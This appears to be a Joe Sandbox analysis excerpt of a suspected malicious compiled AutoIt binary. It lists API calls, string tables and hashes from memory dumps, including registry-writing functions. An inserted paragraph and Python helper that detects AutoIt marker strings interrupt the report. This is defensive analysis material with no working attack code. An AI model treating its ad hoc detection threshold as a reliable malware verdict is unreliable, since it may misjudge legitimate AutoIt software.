                                                                                                                  • Instruction Fuzzy Hash: B091BF7190C305FFC7109F65EC08A6B7BA9FF89364F501A19F962A61E0C7B1D948CB52
                                                                                                                  APIs
                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 00E2DBD6
                                                                                                                  • GetDriveTypeW.KERNEL32(?,00E7DC54,?,\\.\,00E7DC00), ref: 00E2DCC3
                                                                                                                  • SetErrorMode.KERNEL32(00000000,00E7DC54,?,\\.\,00E7DC00), ref: 00E2DE29
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorMode$DriveType
                                                                                                                  • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                  • API String ID: 2907320926-4222207086
                                                                                                                  • Opcode ID: 31ee21c95b7f2f1dfb2517430f77f41de54f80deb298bb6391808ec341d33cf6
                                                                                                                  • Instruction ID: 08b4194179e65906f58a973b1ff160e3c404cdde27af8a47b9462a39cb25e177
                                                                                                                  • Opcode Fuzzy Hash: 31ee21c95b7f2f1dfb2517430f77f41de54f80deb298bb6391808ec341d33cf6
                                                                                                                  • Instruction Fuzzy Hash: 5351C63020CB52AFCB10EF24EC82869B7A1FB94749B247A19F247B72A1DB60DD45D752
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __wcsnicmp
                                                                                                                  • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                  • API String ID: 1038674560-86951937
                                                                                                                  • Opcode ID: 41d474a389ffcdf04729b69cec124aa511d6f8d50d0c77695012bf88ee3d0234
                                                                                                                  • Instruction ID: 335dd9c1bf446dd05b928c040f18ba9bb40c9f9ff77b5c6ec9a3f8be6b98805d
                                                                                                                  • Opcode Fuzzy Hash: 41d474a389ffcdf04729b69cec124aa511d6f8d50d0c77695012bf88ee3d0234
                                                                                                                  • Instruction Fuzzy Hash: DF81F9306403456BCB25BB65DC43FBA37A8EF15305F04A028FE057A1C2EB61DA56C2B1
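The directive strings in the record above (#include-once, #requireadmin, #OnAutoItStartRegister, the "Bad directive syntax error" message) together with the "AutoIt v3" string in the OleLoadPicture record are the AutoIt3 interpreter's own parser tables, which is the evidence behind the "Binary is likely a compiled AutoIt script file" signature. The following triage helper is an added example and is not part of the Joe Sandbox report or its tooling; it scans a buffer (for instance one of the .sdmp memory dumps listed above) for those marker strings in both ASCII and UTF-16LE, since the __wcsnicmp comparison in this record indicates the interpreter keeps them as wide strings. The marker list is taken from this report, and the three-marker threshold is an assumption chosen for the example.

```python
"""Triage helper: flag a buffer that carries the AutoIt v3 interpreter.

Added example, not from the Joe Sandbox report. The marker strings are the
ones the report lists for this sample; the scoring threshold is an assumption.
"""
from __future__ import annotations

# Strings the report attributes to the embedded AutoIt3 interpreter
# (directive parser table plus the "AutoIt v3" string).
AUTOIT_MARKERS = (
    "AutoIt v3",
    "#OnAutoItStartRegister",
    "#include-once",
    "#requireadmin",
    "#notrayicon",
    "#pragma compile",
    "Bad directive syntax error",
    "Unterminated group of comments",
)


def find_markers(buf: bytes) -> dict[str, list[str]]:
    """Return which markers occur in buf, grouped by the encoding they matched in.

    The interpreter stores these as UTF-16LE (wide strings, see __wcsnicmp),
    but a dropped script or a decoded dump may carry ASCII copies, so both
    encodings are checked independently.
    """
    hits: dict[str, list[str]] = {"ascii": [], "utf16le": []}
    for marker in AUTOIT_MARKERS:
        if marker.encode("ascii") in buf:
            hits["ascii"].append(marker)
        if marker.encode("utf-16-le") in buf:
            hits["utf16le"].append(marker)
    return hits


def looks_like_autoit(buf: bytes, min_hits: int = 3) -> bool:
    """Assumed heuristic: at least min_hits distinct markers in any encoding."""
    hits = find_markers(buf)
    distinct = set(hits["ascii"]) | set(hits["utf16le"])
    return len(distinct) >= min_hits


# Constructed sample input (not a real dump): three UTF-16LE markers between padding.
SAMPLE_DUMP = (
    b"\x00" * 16
    + "AutoIt v3".encode("utf-16-le")
    + b"\x00" * 8
    + "#requireadmin".encode("utf-16-le")
    + b"\x00" * 8
    + "#OnAutoItStartRegister".encode("utf-16-le")
    + b"\x00" * 16
)

if __name__ == "__main__":
    print(find_markers(SAMPLE_DUMP))
    print("AutoIt interpreter present:", looks_like_autoit(SAMPLE_DUMP))
```

To run it over a real dump from the report, read the .sdmp file as bytes and pass it to looks_like_autoit; a single marker on its own is not treated as a hit, because "AutoIt v3" alone also appears in legitimate AutoIt-built administration tools.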
                                                                                                                  APIs
                                                                                                                  • DestroyWindow.USER32 ref: 00DFB98B
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00DFB9CD
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00DFB9D8
                                                                                                                  • DestroyCursor.USER32(00000000), ref: 00DFB9E3
                                                                                                                  • DestroyWindow.USER32(00000000), ref: 00DFB9EE
                                                                                                                  • SendMessageW.USER32(?,00001308,?,00000000), ref: 00E5D2AA
                                                                                                                  • 6F760200.COMCTL32(?,000000FF,?), ref: 00E5D2E3
                                                                                                                  • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 00E5D711
                                                                                                                    • Part of subcall function 00DFB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00DFB759,?,00000000,?,?,?,?,00DFB72B,00000000,?), ref: 00DFBA58
                                                                                                                  • SendMessageW.USER32 ref: 00E5D758
                                                                                                                  • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00E5D76F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DestroyMessageSendWindow$DeleteObject$CursorF760200InvalidateMoveRect
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 904983628-4108050209
                                                                                                                  • Opcode ID: 1bc4e554c25b7a0c8f75bc6ec6979573943000784ec94c3ba8c87445aedfb82d
                                                                                                                  • Instruction ID: db63be44607ae7522542cc5feba4a0fb3ea435595fb2f80921ff9559213f24c0
                                                                                                                  • Opcode Fuzzy Hash: 1bc4e554c25b7a0c8f75bc6ec6979573943000784ec94c3ba8c87445aedfb82d
                                                                                                                  • Instruction Fuzzy Hash: 8A12A230608205DFDB21CF14C884BA9BBE5FF0431AF54996AEA89EB251C771EC49CF61
                                                                                                                  APIs
                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 00E4C788
                                                                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00E4C83E
                                                                                                                  • SendMessageW.USER32(?,00001102,00000002,?), ref: 00E4C859
                                                                                                                  • SendMessageW.USER32(?,000000F1,?,00000000), ref: 00E4CB15
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$Window
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 2326795674-4108050209
                                                                                                                  • Opcode ID: 6f238130128234c28ed8b85941f48d52fb0661cb5a8bae3946d48985bbd3bb11
                                                                                                                  • Instruction ID: b071e476d9a971e37535e5eeb43cbc09cb07f806b971bf73972320628c867d4d
                                                                                                                  • Opcode Fuzzy Hash: 6f238130128234c28ed8b85941f48d52fb0661cb5a8bae3946d48985bbd3bb11
                                                                                                                  • Instruction Fuzzy Hash: F6F1F37060A300AFD7518F24EC85BAABBE4FF49358F241919F589F72A1C774D844DB92
                                                                                                                  APIs
                                                                                                                  • CharUpperBuffW.USER32(?,?,00E7DC00), ref: 00E46449
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: BuffCharUpper
                                                                                                                  • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                  • API String ID: 3964851224-45149045
                                                                                                                  • Opcode ID: 050e6aed128317219f06b1f01befed4cd82c134e2760616c334eeea7c93ad06e
                                                                                                                  • Instruction ID: 37ec11a416d2764460ae2b67bc13211520cea6a327696163bbc0fc21e10c2baf
                                                                                                                  • Opcode Fuzzy Hash: 050e6aed128317219f06b1f01befed4cd82c134e2760616c334eeea7c93ad06e
                                                                                                                  • Instruction Fuzzy Hash: 62C195702042458BCB04EF10D551ABE77E6EF96348F059869F9467B3E2DB20ED4BCB62
                                                                                                                  APIs
                                                                                                                  • GetSysColor.USER32(00000012), ref: 00E4D5AE
                                                                                                                  • SetTextColor.GDI32(?,?), ref: 00E4D5B2
                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00E4D5C8
                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00E4D5D3
                                                                                                                  • CreateSolidBrush.GDI32(?), ref: 00E4D5D8
                                                                                                                  • GetSysColor.USER32(00000011), ref: 00E4D5F0
                                                                                                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00E4D5FE
                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 00E4D60F
                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 00E4D618
                                                                                                                  • SelectObject.GDI32(?,?), ref: 00E4D625
                                                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 00E4D644
                                                                                                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00E4D65B
                                                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00E4D670
                                                                                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00E4D698
                                                                                                                  • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00E4D6BF
                                                                                                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 00E4D6DD
                                                                                                                  • DrawFocusRect.USER32(?,?), ref: 00E4D6E8
                                                                                                                  • GetSysColor.USER32(00000011), ref: 00E4D6F6
                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 00E4D6FE
                                                                                                                  • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00E4D712
                                                                                                                  • SelectObject.GDI32(?,00E4D2A5), ref: 00E4D729
                                                                                                                  • DeleteObject.GDI32(?), ref: 00E4D734
                                                                                                                  • SelectObject.GDI32(?,?), ref: 00E4D73A
                                                                                                                  • DeleteObject.GDI32(?), ref: 00E4D73F
                                                                                                                  • SetTextColor.GDI32(?,?), ref: 00E4D745
                                                                                                                  • SetBkColor.GDI32(?,?), ref: 00E4D74F
                                                                                                                  Similarity
                                                                                                                  • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1996641542-0
                                                                                                                  • Opcode ID: 0fc7e0047e04cb28892f6743411470809285e94d077819baa4e547b8f61dc0dc
                                                                                                                  • Instruction ID: 8f4ff1b1bb570c04e9856584288b6cba83bcd0273c8c431e552ca4dc920791bd
                                                                                                                  • Opcode Fuzzy Hash: 0fc7e0047e04cb28892f6743411470809285e94d077819baa4e547b8f61dc0dc
                                                                                                                  • Instruction Fuzzy Hash: F5516A71E05208EFDF109FA9EC48AAE7B79EF09364F114115FA15BB2A0D7B59A00CB60
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00E4B7B0
                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E4B7C1
                                                                                                                  • CharNextW.USER32(0000014E), ref: 00E4B7F0
                                                                                                                  • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00E4B831
                                                                                                                  • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00E4B847
                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E4B858
                                                                                                                  • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00E4B875
                                                                                                                  • SetWindowTextW.USER32(?,0000014E), ref: 00E4B8C7
                                                                                                                  • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00E4B8DD
                                                                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00E4B90E
                                                                                                                  • _memset.LIBCMT ref: 00E4B933
                                                                                                                  • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00E4B97C
                                                                                                                  • _memset.LIBCMT ref: 00E4B9DB
                                                                                                                  • SendMessageW.USER32 ref: 00E4BA05
                                                                                                                  • SendMessageW.USER32(?,00001074,?,00000001), ref: 00E4BA5D
                                                                                                                  • SendMessageW.USER32(?,0000133D,?,?), ref: 00E4BB0A
                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00E4BB2C
                                                                                                                  • GetMenuItemInfoW.USER32(?), ref: 00E4BB76
                                                                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00E4BBA3
                                                                                                                  • DrawMenuBar.USER32(?), ref: 00E4BBB2
                                                                                                                  • SetWindowTextW.USER32(?,0000014E), ref: 00E4BBDA
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 1073566785-4108050209
                                                                                                                  • Opcode ID: 7218a6a4be048534c8bf00008cbfe421d4ac12786a9c9489211f7031af208eed
                                                                                                                  • Instruction ID: 305817b3950c0ee68f846a38e071c2909d87660252b75c071a2131fba2b2b314
                                                                                                                  • Opcode Fuzzy Hash: 7218a6a4be048534c8bf00008cbfe421d4ac12786a9c9489211f7031af208eed
                                                                                                                  • Instruction Fuzzy Hash: 55E1AE70900218AFDB20CF66EC84AEE7BB8FF45754F109156FA19BA290D770CA85DF60
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Foreground
                                                                                                                  • String ID: ACTIVE$ALL$CLASS$H+$HANDLE$INSTANCE$L+$LAST$P+$REGEXPCLASS$REGEXPTITLE$T+$TITLE
                                                                                                                  • API String ID: 62970417-993842312
                                                                                                                  • Opcode ID: 6ebd5d5eb2513a392ded870f2fe6b989cc7a8da28eb7570c6b5c4f9216f201a7
                                                                                                                  • Instruction ID: 5b4219bfe58f63dce413b6120f66359c162b4f2c4751c17d312c24c1a43783de
                                                                                                                  • Opcode Fuzzy Hash: 6ebd5d5eb2513a392ded870f2fe6b989cc7a8da28eb7570c6b5c4f9216f201a7
                                                                                                                  • Instruction Fuzzy Hash: 85D1D830508646ABCB04EF11C8419AABBB4FF55344F049D2DFA56771A1DB30E99ECBB1
                                                                                                                  APIs
                                                                                                                  • GetCursorPos.USER32(?), ref: 00E4778A
                                                                                                                  • GetDesktopWindow.USER32 ref: 00E4779F
                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00E477A6
                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00E47808
                                                                                                                  • DestroyWindow.USER32(?), ref: 00E47834
                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00E4785D
                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E4787B
                                                                                                                  • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00E478A1
                                                                                                                  • SendMessageW.USER32(?,00000421,?,?), ref: 00E478B6
                                                                                                                  • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00E478C9
                                                                                                                  • IsWindowVisible.USER32(?), ref: 00E478E9
                                                                                                                  • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00E47904
                                                                                                                  • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00E47918
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00E47930
                                                                                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 00E47956
                                                                                                                  • GetMonitorInfoW.USER32 ref: 00E47970
                                                                                                                  • CopyRect.USER32(?,?), ref: 00E47987
                                                                                                                  • SendMessageW.USER32(?,00000412,00000000), ref: 00E479F2
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                  • String ID: ($0$tooltips_class32
                                                                                                                  • API String ID: 698492251-4156429822
                                                                                                                  • Opcode ID: b6140b2e8df4833ffa93d0d3b66d845dbe30731ad29c731ef8ae826f9aa7a11c
                                                                                                                  • Instruction ID: a07340034b67dd0c9d344984e706a5b423a442905a8bd8e236e212533ab2de0d
                                                                                                                  • Opcode Fuzzy Hash: b6140b2e8df4833ffa93d0d3b66d845dbe30731ad29c731ef8ae826f9aa7a11c
                                                                                                                  • Instruction Fuzzy Hash: 36B18D71608340AFDB04DF65D948B6EBBE5FF88314F00891DF599AB291DB70E804CBA6
                                                                                                                  APIs
                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00DFA939
                                                                                                                  • GetSystemMetrics.USER32(00000007), ref: 00DFA941
                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00DFA96C
• GetSystemMetrics.USER32(00000008), ref: 00DFA974
• GetSystemMetrics.USER32(00000004), ref: 00DFA999
• SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00DFA9B6
• AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 00DFA9C6
• CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00DFA9F9
• SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00DFAA0D
• GetClientRect.USER32(00000000,000000FF), ref: 00DFAA2B
• GetStockObject.GDI32(00000011), ref: 00DFAA47
• SendMessageW.USER32(00000000,00000030,00000000), ref: 00DFAA52
  • Part of subcall function 00DFB63C: GetCursorPos.USER32(000000FF), ref: 00DFB64F
  • Part of subcall function 00DFB63C: ScreenToClient.USER32(00000000,000000FF), ref: 00DFB66C
  • Part of subcall function 00DFB63C: GetAsyncKeyState.USER32(00000001), ref: 00DFB691
  • Part of subcall function 00DFB63C: GetAsyncKeyState.USER32(00000002), ref: 00DFB69F
• SetTimer.USER32(00000000,00000000,00000028,00DFAB87), ref: 00DFAA79
Strings
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
• String ID: AutoIt v3 GUI
• API String ID: 1458621304-248962490
• Opcode ID: 8215fe2606c3ba72a74ce7cb437b9d758c41c8ab07c9c9baa84121db26172d6b
• Instruction ID: 8a9557c290e4415a64afd849f8eb042feda4c353e4615bf525d84f973f90595c
• Opcode Fuzzy Hash: 8215fe2606c3ba72a74ce7cb437b9d758c41c8ab07c9c9baa84121db26172d6b
• Instruction Fuzzy Hash: DFB1BF71A0420ADFDB14DFA9DC45BAE7BB4FB48315F168229FA05E7290D7B0E844CB61
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: _wcscat$D31560_wcscmp_wcscpy_wcsncpy_wcsstr
• String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
• API String ID: 390803403-1459072770
• Opcode ID: 0247368800d7a646e2ba0cad2504c23f138ff007c43c19f8d032bc3698a9d9df
• Instruction ID: 593f87987ca3b74e3c698ed2cc807523e3a2d37fc3c525a5700439b79eeaf181
• Opcode Fuzzy Hash: 0247368800d7a646e2ba0cad2504c23f138ff007c43c19f8d032bc3698a9d9df
• Instruction Fuzzy Hash: 7F410472A042147BEB00BB64DC47EBF77BCEF01314F14116AF901B6182EB74AA0192B2
APIs
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E43735
• RegCreateKeyExW.ADVAPI32(?,?,00000000,00E7DC00,00000000,?,00000000,?,?), ref: 00E437A3
• RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00E437EB
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00E43874
• RegCloseKey.ADVAPI32(?), ref: 00E43B94
• RegCloseKey.ADVAPI32(00000000), ref: 00E43BA1
Strings
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: Close$ConnectCreateRegistryValue
• String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
• API String ID: 536824911-966354055
• Opcode ID: 2aeecea7af11ead484c513a97ce2daeb368bfbc4084bf6c8889a72da410e053e
• Instruction ID: 8aafc67fe2bd316eeb4f658f758828625bc0cfa3db13946b79151b3ebfb4976c
• Opcode Fuzzy Hash: 2aeecea7af11ead484c513a97ce2daeb368bfbc4084bf6c8889a72da410e053e
• Instruction Fuzzy Hash: 390259756046019FCB14EF25D855A2EB7E5FF88724F05845DF98AAB3A2CB30ED01CBA1
APIs
• CharUpperBuffW.USER32(?,?), ref: 00E46C56
• SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00E46D16
Strings
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: BuffCharMessageSendUpper
